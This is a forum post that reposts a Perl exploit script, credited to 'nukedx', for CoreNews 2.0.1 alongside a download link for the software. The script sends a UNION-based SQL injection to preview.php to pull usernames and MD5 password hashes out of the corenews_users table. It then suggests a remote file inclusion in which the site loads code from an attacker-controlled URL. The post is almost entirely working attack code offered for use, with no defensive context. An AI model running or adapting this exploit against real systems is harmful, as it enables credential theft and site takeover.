Jump to content
Screech

CoreNews 2.0.1

By Screech, in Cosul de gunoi

Recommended Posts

Screech Newbie

Screech

Posted
Posted

Download tut: http://rapidshare.de/files/24936927/core_n..._2.0.1.rar.html

Search: 

Powered by CoreNews 2.0.1

Exploit:

#!/usr/bin/perl

#Method found & Exploit scripted by nukedx

#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com

#Original advisory: http://www.nukedx.com/?viewdoc=24

#Usage: corenews.pl <host> <path>

use IO::Socket;

if(@ARGV != 2) { usage(); }

else { exploit(); }

sub header()

{

print "n- NukedX Security Advisory Nr.2006-24rn";

print "- CoreNews <= 2.0.1 Remote SQL Injection Exploitrn";

}

sub usage()

{

header();

print "- Usage: $0 <host> <path>rn";

print "- <host> -> Victim's host ex: http://www.victim.comrn";

print "- <path> -> Path to CoreNews ex: /corenews/rn";

exit();

}

sub exploit ()

{

#Our variables...

$cnserver = $ARGV[0];

$cnserver =~ s/(http://)//eg;

$cnhost = "http://".$cnserver;

$cndir = $ARGV[1];

$cnport = "80";

$cntar = "preview.php?userid=";

$cnxp = "-1/**/UNION/**/SELECT/**/null,concat(2022,login,20223,password,2203),null,null,null,null/**/FROM/**/corenews_users/*";

$cnreq = $cnhost.$cndir.$cntar.$cnxp;

#Sending data...

header();

print "- Trying to connect: $cnserverrn";

$cn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cnserver", PeerPort => "$cnport") || die "- Connection failed...n";

print $cn "GET $cnreq HTTP/1.1n";

print $cn "Accept: */*n";

print $cn "Referer: $cnhostn";

print $cn "Accept-Language: trn";

print $cn "User-Agent: NukeZillan";

print $cn "Cache-Control: no-cachen";

print $cn "Host: $cnservern";

print $cn "Connection: closenn";

print "- Connected...rn";

while ($answer = <$cn>) {

if ($answer =~ /2022(.*?)20223([d,a-f]{32})2203/) {

print "- Exploit succeed!rn";

print "- Username: $1rn";

print "- MD5 HASH of PASSWORD: $2rn";

print "- If you crack hash you can use RFI with example ->rn";

print "- Example: $cnhost$cndir?show=http://yourhost.com/file.txtrn";

exit();

}

}

#Exploit failed...

print "- Exploit failedn"

}[/list:u]

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...